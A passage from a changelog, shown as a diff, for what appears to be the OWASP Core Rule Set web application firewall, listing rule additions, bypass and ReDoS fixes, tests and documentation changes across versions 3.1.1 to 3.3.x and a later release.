[#2467] + * docs: update policy to include signed releases (Felipe Zipitría) [#2465] + * Change documentation git module link to https (İlteriş Eroğlu) [#2461] + * Optimize regex in 942440 (Felipe Zipitría) [#2459] + * Improve performance by removing unnecessary lowercase transformations (Jozef Sudolský) [#2106] + * change-version: fix typo (Deepshikha Sinha) [#2430] + * Renaming tx.blocking_early to tx.early_blocking (Christian Folini) [#2414] + * Add editorconfig file to keep spacing in good shape (Felipe Zipitría) [#2407] + * Remove all whitespace at EOL (Felipe Zipitría) [#2405, #2406] + * 920520: improve comment (Max Leske) [#2391] + * Fix yamllint (Felipe Zipitría) [#2387] + * README: fix typos (Priyam Patel) [#2494] + * Initialization: fix typo (Elia Pinto) [#2366] + * Fix changed Trustwave URLs (Elia Pinto, henkworks, Felipe Zipitría) [#2213, #2364, #2204] + * Improve logging in some special cases (Jozef Sudolský) [#2347] + * Rename nodejs to generic category (Felipe Zipitría) [#2340] + * Fixed assembly of 920120-no-backtracking.data (Max leske) [#2333] + * Move regexp-assembly to separate directory (Felipe Zipitría) [#2327] + * Fix attack type of a few rules (Jozef Sudolský) [#2324] + * Optimize regex in 942400 (Jozef Sudolský) [#2323] + * Web shells: optimize regexps (Jozef Sudolský) [#2315] + * Move 941120 from PL1 to PL2 (Christian Folini) [#2306] + * Move 920300 from PL2 to PL3 (Franziska Bühler) [#2013] + * Fix ReDOS in rule 942350 (Andrea Menin) [#2300] + * Fix ReDOS in rule 941140 (Andrea Menin) [#2050] + * Fix false negative in rule 920480 (katef, Federico G. Schwindt) [#1957] + * Disassemble regexp in rule 930100 (Andrew Howe) [#2298] + * Amend 920300 to exclude CONNECT requests (Andrew Howe) [#2297] + * Restrict rule 941170 (Andrea Menin) [#2292] + * Fix NextCloud example comments (Joost de Keijzer) [#2282] + * Fix ruleid typos in comments (Paul Beckett) [#2263] + * Fix capec id for crawlers (Jozef Sudolský) [#2258] + * Fix docs for Apache (Jozef Sudolský) [#2238] + * Align actions in right order (Ervin Hegedus) [#2237] + * Fix logging by moving ctl action in chain to 2nd rule (Franziska Bühler) [#2202] + * Fix rule 9004110 to use newer format for var (Andrew Howe) [#2200] + * Remove the fuzzy regularity of the 942310 rule (NiceYouKnow) [#2189] + * docs: update links and format of known bugs (Felipe Zipitría) [#2186] + * Added missing " from the end of actions list (Ervin Hegedus) [#2184] + * sponsors.md: add file (Christian Folini) [#2174] + * crs-setup.conf: add note to allowed_request_content_type settings (Ervin Hegedus) [#2164] + * README: update for Nginx (vijayasija99) [#2158] + * Replace usage of ctl:ruleEngine=Off by ctl:ruleRemoveByTag=OWASP_CRS (Jozef Sudolský) [#2156] + * Remove old commented-out rule 910110 (Paul Beckett) [#2148] + * Replace Blacklist and Whitelist with Deny list and Allow list (Paul Beckett) [#2137] + * Fix donate URL (Felipe Zipitría) [#2132] + * Owncloud: Fix rule 9003001 to match both dav and webdav (Abu Dawud) [#2130] + * Add link to slack invitation to README (Christian Folini) [#2122] + * Fix bug in rule 942190 and add test case (NiceYouKnow, Max Leske, Franziska Bühler) [#2112] + * Added directories needed for volume mounts to Git (Max Leske) [#2103] + * Added a note to a commented rule about unsupported action in v3 (Ervin Hegedus) [#2098] + * Added missing space after comment mark (Ervin Hegedus) [#2097] + * Fix typo in sampling mode description (Christian Folini) [#2090] + * contributing.md: rewording (Christian Folini) [#2077] + * Replaced ARGS by ARGS_GET in rules in phase:1 (Ervin Hegedus) [#2063] + * Fix OWASP Slack URL (Jozef Sudolský) [#2056] + * Add example exclusion rule for monitoring agents (Andrea Menin) [#2037] + * Fix Nginx logging in docker-compose (Felipe Zipitría) [#2036] + * Fix Sec-CH-UA and Sec-CH-UA-Mobile request header validation (somechris) [#2028] + * Fix typo in comment (Federico G. Schwindt) [#2011] + * Fix magic number that crashes old PHP versions (Kyzentun, Walter Hop) [#2010] + * Add timezone variable to docker-compose (Felipe Zipitría) [#1995] + * Enhancement of installation process for Nginx / IIS (Jozef Sudolský) [#1988] + * Removing %{MATCHED_VAR} from logging (Jozef Sudolský) [#1985] + * Drop unneeded capture groups (Federico G. Schwindt) [#1983] + * Add support for sec-ch-ua and sec-ch-ua-mobile within Validate Bytes (Chaim Sanders) [#1970] + * Update description of rule 920350 (Christian Folini) [#1952] + * Fix stricter sibling comment for SQL Injection (Stephen Sigwart) [#1913] + * Fix chained condition for correlation rules 980120 and 980150 (Simon Studer) [#1898] + * Link fix for docs/OWASP-CRS-Documentation submodule (Ervin Hegedus) [#1885] + * Add missing PL tags to all rules (Ervin Hegedus) [#1882] + * Remove 'log' from rules and let SecDefaultAction decide what to do (Federico G. Schwindt) [#1876] + * Remove unneeded transformation from MATCHED_VARS (Federico G. Schwindt) [#1852] + * Fix indentations (Ervin Hegedus) [#1851] + * Drop unneeded escapes (Federico G. Schwindt) [#1842] + * Tests: 100% test coverage (Christian Folini, Franziska Bühler, Paul Beckett, Ervin Hegedus, Juan-Pablo Tosso, NiceYouKnow) + * Tests: Normalized keys in test files (Ervin Hegedus) [#2493] + * Tests: Fix test titles (bxlxx.wu, Ervin Hegedus) [#2504, #2497] + * Tests: use same user-agent (Felipe Zipitría) [#2393] + * Tests: fixed end boundary in 932180-2 (Ervin Hegedus) [#2377] + * Tests: clean up quoting (Max Leske) [#2370] + * Tests: add tests for 920120 (Max Leske) [#2369] + * Tests: improve test setup, rewrite of log checker (Max Leske) [#2363] + * Tests: add common and uniform http headers to tests (Felipe Zipitría) [#2362] + * Tests: add tests for 921180 (Juan-Pablo Tosso, Christian Folini) [#2308] + * Tests: add tests for 920275, 913101, 913102, 920410, 920171, 932190, 932110, 932105 (Ervin Hegedus) [#2021, #2253, #2257, #2294, #2295, #2285, #2286, #2287] + * Tests: add tests for 932170, 932171, 932106, 932180, 942170, 942251, 942460 (Franziska Bühler) [#2252, #2254, #2255, #2280, #2283, #2284, #2269, #2268] + * Tests: add tests for 933111, 933190, 933200 (NiceYouKnow) [#2281] + * Tests: add tests for 920341 (Juan-Pablo Tosso) [#2266] + * Tests: add tests for FP 921110 request smuggling (Franziska Bühler) [#2102] + * Tests: Add a Chrome and Firefox version 100 UA (Mike Taylor) [#2325] + * Tests: Add tests for 920121, 932150, 932160, 932120, 932130, 921151 (Paul Beckett) [#2264, #2275, #2276, #2272, #2273, #2270] + * Tests: add test against FP when using urlDecode for 932140 (Max Leske) [#2191] + * Tests: fix Python version for tests (Max Leske) [#2247] + * Tests: fix 933160-21 and 942500-1 due to invalid URI (Takaya Saeki) [#2168] + * Tests: remove broken test 932100-3 (Felipe Zipitría) [#2165] + * Tests: fix logging problem for Nginx (vijayasija99) [#2157] + * Tests: use only valid YAML (Felipe Zipitría) [#2080] + * Tests: fix requirements version (nobletrout) [#2004] + * Tests: fix tests lacking charset (Felipe Zipitría) [#1932] + +Changes limited to documentation and tests: + * docs: update SPONSORS.md for new release (Christian Folini) [#3341] + * docs: update CONTRIBUTORS.md for new release (Ervin Hegedüs) [#3340] + * docs: Transferred CHANGES to CHANGES.md (Felipe Zipitría) [#2606] + * docs: Bring CONTRIBUTING.MD in line with documentation (Andrew Howe) [#2558] + * docs: Add to CONTRIBUTING.MD chain rule commenting guidance (Ervin Hegedus) [#3196] + * docs: Explained to leave audit log settings alone in CONTRIBUTING.md (Christian Folini) [#3090] + * docs: update documentation hyperlinks on rules (Dexter Chang) [#3232] + * docs: add documentation on blocking of archive file extensions that are not blocked by default (Andrew Howe) [#2758] + * docs: fixed minor typo in comment in file rules/restricted-files.data (Homesteady) [#3305] + * docs: Add note of lack of rule range support in ModSecv3 (Andrew Howe) [#3303] + * docs: sync CONTRIBUTING.MD with HTML version (Andrew Howe) [#3301] + * docs: fix typos across the entire project as reported by codespell (Ervin Hegedus) [#2519] + * tests: fix duplicated tests for rule 934130 PL1 (Walter Hop) [#2918] + * tests: add test for rule 941130 PL1 (Paul Beckett) [#2923] + * tests: increase tests (920280-3, 920430-3, 920430-9) compatibility with other proxies (Matteo Pace) [#3134] + * tests: detection of *nix RCE using multiple variable assignments (932200 PL2) (Christian Folini) [#2899] + * tests: additional tests for use in PHP wrappers in PHP injection attacks (rule 933200 PL1) (Andrew Howe) [#2723] + * tests: Add positive test 920100-16 for rule 920100 PL1 (Andrew Howe) [#2952] + * tests: Add positive test 920190-3 for rule 920190 PL1 (Andrew Howe) [#2956] + * tests: Add positive test 921120-4 for rule 921120 PL1 (Andrew Howe) [#3083] + * tests: Add positive test 920340-3 for rule 920340 PL1 (Andrew Howe) [#2972] + * tests: Add positive test 920250-4 for rule 920250 PL1 (Andrew Howe) [#2971] + * tests: Add positive test 920470-18 for rule 920470 PL1 (Andrew Howe) [#3058] + * tests: Add positive test 921150-2 for rule 921150 PL1 (Andrew Howe) [#3158] + * tests: Add positive test 932160-8 for rule 932160 PL1 (Christian Folini) [#2997] + * tests: add test for `sql_compileoption_used` detection (rule 942151 PL1) (Andrew Howe) [#2714] + * tests: Rearranged tests for rule 920400 PL1 (Matteo Pace) [#2877] + * tests: fixed URLs tests for rules 934130 PL1 and 934131 PL2 (Matteo Pace) [#3133] + * tests: fixed URLs tests for rule 932130 PL1 (Matteo Pace) [#2880] + * tests: Rearranged tests for rule 920340 (Christian Folini) [#3089] + * tests: add test for rule 941140 PL1 (Franziska Bühler) [#2995] + * tests: add test for rule 941170 PL1 (Franziska Bühler) [#2994] + * tests: add test for rule 941200 PL1 (Franziska Bühler) [#2993] + * tests: add test for rule 941240 PL1 (Franziska Bühler) [#2975] + * tests: add test for rule 941310 PL1 (Franziska Bühler) [#2974] + * tests: add test for rule 941400 PL1 (Franziska Bühler) [#2969] + * tests: add test for rule 942170 PL1 (Franziska Bühler) [#2968] + * tests: add test for rule 942270 PL1 (Franziska Bühler) [#2967] + * tests: add test for rule 942350 PL1 (Franziska Bühler) [#2965] + * tests: add test for rule 942500 PL1 (Franziska Bühler) [#2964] + * tests: add test for rule 943100 PL1 (Franziska Bühler) [#2962] + * tests: add test for rule 942520 PL2 (Franziska Bühler) [#2706] + * tests: add tests for rules 942521 and 942522 PL2 (Franziska Bühler) [#2708] + * tests: fix tests on rule 932200 to detect FPs (Max Leske) [#3309] + * tests: deprecate ftw in favor of go-ftw (Felipe Zipitría) [#3076] + * tests: remove Accept-Charset from test files (Felipe Zipitría) [#2781] + * tests: enable utf8 encoding validation (Felipe Zipitría) [#2992] + * tests: fix test using old syntax and add go-ftw check (Felipe Zipitría) [#2715] + * tests: extend coverage for rule 932220 (Felipe Zipitría) [#3063] + * tests: extend coverage for rule 932120 (Felipe Zipitría) [#2996] + * tests: extend coverage for rule 932200 (Felipe Zipitría) [#2950] + * tests: add test to prove we cover complex shell variables usage in rule 932230 (Felipe Zipitría) [#2966] + + + +## Version 3.3.2 - 2021-06-30 + +Fixes and improvements: + * Fix CVE-2021-35368 WAF bypass using pathinfo (Christian Folini) + +## Version 3.3.0 - 2020-07-01 + +Important changes: + * The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the new separator to use. + +New functionality: + * Block backup files ending with ~ in filename (Andrea Menin) + * Detect ffuf vuln scanner (Will Woodson) + * Detect Nuclei vuln scanner (azurit) + * Detect SemrushBot crawler (Christian Folini) + * Detect WFuzz vuln scanner (azurit) + * New LDAP injection rule (Christian Folini) + * New HTTP Splitting rule (Andrea Menin) + * Add .swp to restricted extensions (Andrea Menin) + * Allow CloudEvents content types (Bobby Earl) + * Add CAPEC tags for attack classification (Fernando Outeda, Christian Folini) + * Detect Unix RCE bypass techniques via uninitialized variables, string concatenations and globbing patterns (Andrea Menin) + +Removed functionality: + * Removed outdated rule tags WASCTC, OWASP_TOP_10, OWASP_AppSensor/RE1, and OWASP_CRS/FOO/BAR; note that tags 'OWASP_CRS' and 'attack-type' are kept. (Christian Folini) + +Improved compatibility: + * Changed variable to lowercase (modsec3 behavior fix) (Ervin Hegedus) + +Fixes and improvements: + * WordPress: Add support for upload image/media in Gutenberg Editor (agusmu) + * Prevent bypass of rule 921110 (Amit Klein, Franziska Bühler) + * Prevent bypass of rule 921130 (Amit Klein, Franziska Bühler) + * fix CVE msg in rules 944120 944240 (Fernando Outeda) + * Remove broken or no longer used files (Federico G. Schwindt) + * Make content-type case insensitive (Franziska Bühler) + * Move /util/docker folder from v3.3/dev branch to dedicated repo (Peter Bittner) + * feat(lint): split actions in linting and regression (Felipe Zipitria) + * Fix FP in 921120 (Franziska Bühler) + * Add missing OWASP_CRS tags (Christian Folini) + * Fix GHA badges (Federico G. Schwindt) + * feat(badge): add apache license badge + * fix typos found by fossies codespell (Tim Herren) + * Decrease processing time of rules (Ervin Hegedüs) + * handle multiple directives in 920510 (Andrea Menin) + * handle multiple directives in 920510 (Andrea Menin) + * fix(ci): use log_contains instead (Felipe Zipitria) + * Move test where it belongs (Federico G. Schwindt) + * fix(ci): use docker in DetectionOnly (Felipe Zipitria) + * fix(rule): remove dangling whitespace (Felipe Zipitria) + * fix(ci): run actions on .github change (Felipe Zipitria) + * fix(docs): update badges and links in readme (Felipe Zipitria) + * README: update repo link (Walter Hop) + * Update README: Copyright 2019 -> 2020 (Christian Folini) + * fix(ci): run tests also on PRs (Felipe Zipitria) + * fix(ci): change test name and fix default params (Felipe Zipitria) + * Restore Travis Status (was in the wrong repo) (Christian Folini) + * Remove outdated Travis status after migration (Christian Folini) + * feat(ci): adds github actions testing (Felipe Zipitria) + * fix(migration): post migration tasks (Felipe Zipitria) + * feat(templates): add text to gihub templates about migration. To be reverted after migation is done. (Felipe Zipitria) + * Added more explanations to comment of 920300 (Christian Folini) + * Added 'ver' action with current version to all necessary rules (Ervin Hegedus) + * Update nextcloud excl rules and shorten var (Franziska Bühler) + * Change to preferred lowercase var (Franziska Bühler) + * Set var to lowercase and change comment (Franziska Bühler) + * Resolve issue with allowed_request_content_types (Franziska Bühler) + * Allow REPORT requests without Content-Type header in Nextcloud (pyllyukko) + * Suppress rule 200002 when editing contacts in Nextcloud (pyllyukko) + * XenForo: update exclusions (Walter Hop) + * WordPress: exclude additional URL fields in profile editor (Walter Hop) + * add www to link (NullIsNot0) + * Fix link for 941310 Old link does not work anymore. Change it to new one. (NullIsNot0) + * Add Content-Type: multipart/related as allowed default (jeremyjpj0916) + * Resolve issue 1722 and fix content-type whitelisting (Franziska Bühler) + * make severities and scores consistent (Walter Hop) + * add QQGameHall UA (#1731) (Andrea Menin) + * another test (Allan Boll) + * Add word boundaries around values in SQL tautologies (942130) (Allan Boll) + * Move tests to their own file, while here also correct permissions for 920180. (Federico G. Schwindt) + * Rule to check if both C-L and T-E are present (#1310) (Federico G. Schwindt) + * Fixes for 2 tests in 921200 (Christian Folini) + * XenForo: add exclusions, remove unnecessary chains (#1673) (Walter Hop) + * Fix FPs for 942350 (#1706) (Franziska Bühler) + * Fix typos found by codespell / Fossies project (#1702) (Simon Studer) + * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) + * Narrowing down the subpattern .*? in 941130 (Christian Folini) + * Restricting a wide regex a bit (Christian Folini) + * Drop escapes (Christian Folini) + * Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) + * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) + * Remove trailing dot in several msg actions (#1678) (Tim Herren) + * Replace REQUEST_BODY with ARGS on 930100 and 930110 (#1659) (Andrea Menin) + * Temporary travis workaround to buy time and fix it for good (#1684) (Andrea Menin) + * Add regression tests (Franziska Bühler) + * Fix FP with create with 942360 (Franziska Bühler) + * Avoid embedded anchors in CRS rule 942330 (Allan Boll) + * Update 942450 for less false positives, more tests (#1662) (Will Woodson) + * Ensure single ranges are also checked (#1661) (Federico G. Schwindt) + * WordPress: also exclude posts/pages endpoint in subdirectories (Walter Hop) + * For bugs, also ask for the environment (#1657) (Federico G. Schwindt) + * XenForo: fix incorrect escape (Walter Hop) + * XenForo: additional exclusions (Walter Hop) + * Pattern cleanup across several rules (#1643). Drop unneeded non-capture groups; No need to escape "-" outside character classes And only if it is not at the end. (Federico G. Schwindt) + * Improve rule 941350: Previously, this rule will also match on the equivalent to "<..<". Rewrite it so it is only triggered by the equivalent to "<..>", simplifying the pattern quite a bit as a bonus. While here add a link describing the bypass for future reference. + * Fix test Was using the equivalent to "<...<" instead of "<...>". (Federico G. Schwindt) + * Move the help and support link to contacts (#1647) While here rename to ensure they are presented in the right order and minor cosmetics. (Federico G. Schwindt) + * Move remaining regression test data file to new folder, cleanup README (#1646) (Peter Bittner) + * Also ask for the paranoia level (Federico G. Schwindt) + * Make it a tiny bit more colorful (Federico G. Schwindt) + * Spacing (Federico G. Schwindt) + * Fix emoji (Federico G. Schwindt) + * Switch to multiple templates for github issues (#1644) (Federico G. Schwindt) + * Fix paranoia-level log description (Andrea Menin) + * change IRC to Slack (Walter Hop) + * fix spacing (Walter Hop) + * Moving tests and documentation folders (#1627) (Soufiane Benali) + * add triggered rule (#1636) (Andrea Menin) + * Drop the translate header from the restricted list Fixes #1410. (Federico G. Schwindt) + * Mark stale issues (Federico G. Schwindt) + * Added support for >). Use negated classes for better performance. (Federico G. Schwindt) + * Add test for issue #1580 (#1612) (Federico G. Schwindt) + * removes t:lowercase (Andrea Menin) + * Move integration tests to their own job (#1608) Also cleanup branches' list. (Federico G. Schwindt) + * Add PL1 tag. (Anna Winkler) + * Change version number for full version name (Felipe Zipitria) + * Better document legacy conversion procedure Add text with instructions for a simple conversion utility. (Felipe Zipitria) + * Correct example text regarding GeoIP. Add maxmind tool for downloading files (Felipe Zipitria) + * Ignore configuration files generated by the JetBrains editors (Anna Winkler) + * Update name of branch to use for feature branches. Minor syntax updates. (Anna Winkler) + * Minor optimisation (Emile-Hugo SPIR) + * Also fix the `as herefrom` pattern (Emile-Hugo SPIR) + * More conservative fix (Emile-Hugo SPIR) + * Update the source file (Emile-Hugo SPIR) + * Fix a FP (`, aside from`) (Emile-Hugo SPIR) + * regression fix for #1581 (emphazer) + * Change order to check ip first in both rules (Felipe Zipitria) + * Change chain order (Felipe Zipitria) + * Fix spacing in text (Felipe Zipitria) + * Add link to mailing list archives (Felipe Zipitria) + * Adding new test for 941150 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941340 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941280 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941170 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941250 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941220 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941330 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941300 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941230 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941260 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941290 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941270 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 942180 based on XSS cheatsheet by portswigger (Christian Folini) + * Update mailing list links to google group (Felipe Zipitria) + * Fix typo and add 2 new entries to 941160 (Franziska Bühler) + * Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) + * Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) + * Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) + * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) + * Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) + * fix rule regex due to remove t:removeComments (Andrea Menin) + * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) + * update Dockerfiles and Travis to use v3.3/dev (Walter Hop) + +## Version 3.2.0 - 2019-09-24 + +New functionality: + * Add AngularJS client side template injection 941380 PL2 (Franziska Bühler) + * Add docker-compose.yaml and example rule exclusion files for docker-compose (Franziska Bühler) + * Add extended access.log format to Docker (Franziska Bühler) + * Add libinjection check on last path segment (Max Leske, Christian Folini) + * Add PUBLIC identifier for XML entities (#1490) (Rufus125) + * Add .rdb to default restricted_extensions (Walter Hop) + * Add .swp to default restricted_extensions (Andrea Menin) + * Add rule 933200 PHP Wrappers (Andrea Menin) + * Add send-payload-pls.sh script to test payload against multiple paranoia levels (Christian Folini, Manuel Spartan) + * Add support for shell evasions with $IFS (Walter Hop, Chaim Sanders) + * Add unix-shell commands (Christoph Hansen, Chaim Sanders) + * Also inspect the path for the script tag (Federico G. Schwindt) + * Detect 80legs, sysscan, Gobuster scanners (Brent Clark) + * Detect CGI source code leakages (Christoph Hansen, Walter Hop) + * Detect 'crawler' user-agent (Federico G. Schwindt) + * Detect Jorgee, Zgrab scanners (Walter Hop) + * Detect MySQL in-line comments (Franziska Bühler) + * Detect Wappalyzer scanner (Christian Folini, Chaim Sanders) + * Java RCE: Add struts namespaces (Walter Hop) + * Java RCE: Detect more java classes (Manuel Leos) + * Javascript: Add 941370 preventing a bypass for 941180 (Andrea Menin) + * Make CRS variables configurable in Docker image (Franziska Bühler) + * New PL3 rule 920490 to protect against content-type charset bypassing (Christian Folini) + * Node.js unserialization + javascript RCE snippets (Walter Hop) + * Request smuggling: Also cover pre http/1.0 requests (Federico G. Schwindt) + * Restricted files: Added many dotfiles (Dan Ehrlich) + * SQLi bypass detection: ticks and backticks (Franziska Bühler) + * XenForo rule exclusion profile (Walter Hop) + +Removed functionality: + * Remove unused protected_uploads setting from setup (Walter Hop) + * Remove deprecated tx.msg and tx.%{rule.id}-... (Federico G. Schwindt) + * Remove deprecated upgrade script (Walter Hop) + +Improved compatibility: + * Add OWASP_CRS tags for ModSec 3 changes and replace ruleRemoveTargetByTag arguments (Ervin Hegedus) + * Replace @contain % with @rx 25; ModSec 3 fails to parse % by itself (or escaped). (Federico G. Schwindt) + * RE2 compatibility for 941130, 920220, 920240, 920230, 920460, 942200, 942370 (Allan Boll) + * Hyperscan compatibility and simplification for 942450 (Allan Boll) + +Fixes and improvements: + * 932140: fix ReDoS in FOR expression (Walter Hop) + * 933200: Simplify pattern (Federico G. Schwindt, Andrea Menin) + * 941380: fix anomaly score variable (Franziska Bühler) + * 942510, 942511: fix anomaly score variable (Walter Hop) + * Add content-type application/csp-report (Andrea Menin) + * Add content-type application/xss-auditor-report (Andrea Menin) + * Add CRS 3.2 Badge build support. (Chaim Sanders) + * Add CVE numbers for Apache Struts vulnerabilities to comments in rules (Franziska Bühler) + * Add CVE-2018-11776 to comments of 933160 and 933161 (Franziska Bühler) + * Add CVE-2018-2380 to comments of rules (Franziska Bühler) + * Add default env vars for anomaly scores in Docker (Franziska Bühler) + * Add missing OWASP_CRS tags to 921xxx rules (Walter Hop) + * Add REQUEST_FILENAME to rule id 944130 and add exploits to comment (Franziska Bühler) + * Add spaces in front of closing square brackets (Franziska Bühler) + * Add travis changes (#1316) (Chaim Sanders) + * Allow dot characters in Content-Type multipart boundary (Walter Hop) + * Also handle dot variant of X_Filename. PHP will transform dots to underscore in variable names since dot is invalid. (Federico G. Schwindt) + * As per the ref manual, it is compressWhitespace (Federico G. Schwindt) + * Avoid php leak false positive with WOFF files (Manuel Spartan) + * Bring back CRS 2.x renumbering utility (Walter Hop) + * Clean up travis and reorg (Federico G. Schwindt) + * Code cosmetics: reorder the actions of rules (Ervin Hegedus) + * Content-Type is case insensitive (Federico G. Schwindt) + * Disassembled 941160 (Franziska Bühler) + * Drop separate regexp files. They are not really needed and save us from updating multiple places. (Federico G. Schwindt) + * Drop t:lowercase from 941350 (Federico G. Schwindt) + * Drop unneeded capture groups and tidy up (Federico G. Schwindt) + * Drop unneeded capture groups and tidy up regexps (Federico G. Schwindt) + * Drop unneeded unicode from 941110. Add tests to cover a few more variants as well as a negative test (Federico G. Schwindt) + * Fix 920440 "URL file extension is restricted by policy" regex (Andrea Menin) + * Fix 920460 test (Federico G. Schwindt) + * Fix 942101 and 942460 by adding to sqli_score variable (Christian Folini) + * Fix checking the existence of 'HTTP' trailing request verb and request path in the payload for HTTP request smuggling; decreases false-positives on free-form text. (Yu Yagihashi) + * Fix commit default for non 2.9 branch (Chaim Sanders) + * Fix CRS2->CRS3 mapping table (973344 -> 941100) (Chaim Sanders) + * Fix date (Chaim Sanders) + * Fix Docker image SSL support (Franziska Bühler) + * Fix duplicate .env (jschleus, Chaim Sanders) + * Fix executing paranoia level counters (Christian Folini) + * Fix indentation and python version in crs2-renumbering script (Chaim Sanders) + * Fix input / headers misordering (Christian Folini) + * Fix path traversal attack pattern at id:930110 (Ervin Hegedus) + * Fix regexp in Docker image (Franziska Bühler) + * Fix regexp with incorrect dot '.' escape in rule 943120 (XeroChen) + * Fix request header Sec-Fetch-User false positive (na1ex) + * Fix runaway regexp in 942260. Add variant regexp assemble script to handle possessive qualifiers. Use possessive qualifiers to tight this up and solve ReDoS problem. (Federico G. Schwindt) + * Fix small typo in variable (Felipe Zipitria) + * Fix spelling error in variable name (supplient) + * Fix transform name pointed out by secrules_parsing (Federico G. Schwindt) + * Fix Travis Merge not being able to find HEAD (Chaim Sanders) + * Fix vulnerable regexp in rule 942490 (CVE-2019-11387) (Christoph Hansen) + * Fix wrong regex, assembly result, in 942370 (Franziska Bühler) + * INSTALL: advise to use release zips, remove upgrade.py, update Nginx (Walter Hop) + * Java: change tag from COMMAND_INJECTION to JAVA_INJECTION (Manuel Spartan) + * Jwall auditconsole outbound anomaly scoring requirements (Christoph Hansen) + * Mark patterns not supported by re2 (Federico G. Schwindt) + * Move duplicated 900270 to 900280 Fixes #1236. (Federico G. Schwindt) + * Move PROXYLOCATION var (Franziska Bühler) + * PHP: move get_defined_functions() and friends into PL1 (Walter Hop) + * Pin the ftw version to 1.1.7 for now (Federico G. Schwindt) + * Prevent bypass 933180 PHP Variable Function (Andrea Menin) + * Reduce comments, introduction of triggered exploits (Franziska Bühler) + * Remove all trailing spaces from ftw yaml test files (Ervin Hegedus) + * Remove auditlog No other rules specify it. Add missing quotes and drop rev (Federico G. Schwindt) + * Remove capture, remove tx.0, add transformation functions, fix regex, add presentation link (Andrea Menin) + * Remove old and unwanted setvar constructs (Federico G. Schwindt) + * Remove superfluous comments (Walter Hop) + * Remove superfluous pmf (Federico G. Schwindt) + * Remove t:lowercase from 920490 (Christian Folini) + * Remove WARNING from php-errors.data (Andrea Menin) + * Reorder actions (Federico G. Schwindt) + * Replacing all @pmf with @pmFromFile (Christian Treutler) + * Restricted-files.data: add AWS config (Walter Hop) + * SQLI: removed unnecessary + (Christoph Hansen) + * Switch Docker image to owasp/modsecurity:2.9-apache-ubuntu (Federico G. Schwindt) + * unix-shell.data: fix typo in 'more' (Walter Hop) + * Update .travis.yml Update to support v3.1 (Chaim Sanders) + * Update dockerfile to always use 3.2/dev (Federico G. Schwindt) + * Update OWASP CRS Docker image to support the new upstream and 2.9.3 (Peter Bittner, Chaim Sanders) + * Update RESPONSE-950-DATA-LEAKAGES.conf (Christoph Hansen) + * Update RESPONSE-959-BLOCKING-EVALUATION.conf (Christoph Hansen) + * Wordpress: add support for Gutenberg editor (siric_, Walter Hop) + * Wordpress: allow searching for any term in admin posts/pages overview (Walter Hop) + * WordPress: exclude Gutenberg via rest_route (Walter Hop) + * WordPress: exclude some more profile.php fields from RFI rule (Walter Hop) + * WordPress: exclude SQL comment rule from _wp_http_referer (Walter Hop) + * XML Soap Encoding fix 920240 (Christoph Hansen) + +Unit tests: + * 932140: add regression tests (Walter Hop) + * 933180: fix tests which were doing nothing (Walter Hop) + * 941370: add some more tests, fix whitespace (Walter Hop) + * Add more tests for 941130 (Christian Folini) + * Add regression test for 941101 (Avery Wong) + * Add regression tests for 942150, 942100, 942260 (Christian Folini) + * Add regression tests to 941160 (Franziska Bühler) + * Add some regression tests (Ervin Hegedus) + * Add testing support for libmodsecurity running on Apache and Nginx (Chaim Sanders) + * Add tests for 941360 that fights JSFuck and Hieroglyphy (Christian Folini) + * Add tests for rule 921110 (Yu Yagihashi) + * Added regression tests for rules 942320, 942360, 942361, 942210, 942380, 942410, 942470, 942120, 942240, 942160, 942190, 942140, 942490, 942120 (Christoph Hansen) + * Drop tests for removed rules (Federico G. Schwindt) + * Fix failing regression tests (Ervin Hegedus) + * Fix failing tests (Manuel Spartan, Chaim Sanders) + * Fix readme typos in example rule (Walter Hop) + * Fix test 941110-2 (Federico G. Schwindt) + * Fix YAML 1.2 compliance with "true" (Federico G. Schwindt) + * RCE: Add tests for the for command (Federico G. Schwindt) + * Update regression tests for rules 931110, 931120, 931130 (Simon Studer) + +Documentation: + * Add details to README for Dockerhub (Franziska Bühler) + * Add intro/comment to CVE comments (Franziska Bühler) + * CONTRIBUTING: add note about separate PRs (Walter Hop) + * Erased gitter chat. Added CII badge (Felipe Zipitria) + * Replaced descriptions (Christian Folini) + * Summarized authors on single line in tests for 941160 (Christian Folini) + * Update broken link in regexp-assemble blog URLs (Walter Hop) + * Update CONTRIBUTING.md To base changes on v3.2/dev. (Felipe Zipitría) + * Update CONTRIBUTORS order (Andrea Menin) + * Update README.md (Rufus125) + * Updating crs site location (Chaim Sanders) + +## Version 3.1.1 - 2019-06-26 + + * Fix CVE-2019-11387 ReDoS against CRS on ModSecurity 3 at PL 2 (Christoph Hansen, Federico G. Schwindt) + * Content-Type made case insensitive in 920240, 920400 (Federico G. Schwindt) + * Allow % encoding in 920240 (Christoph Hansen) + * Fix bug in 920440 (Andrea Menin) + * Fix bug in 920470 (Walter Hop) + * 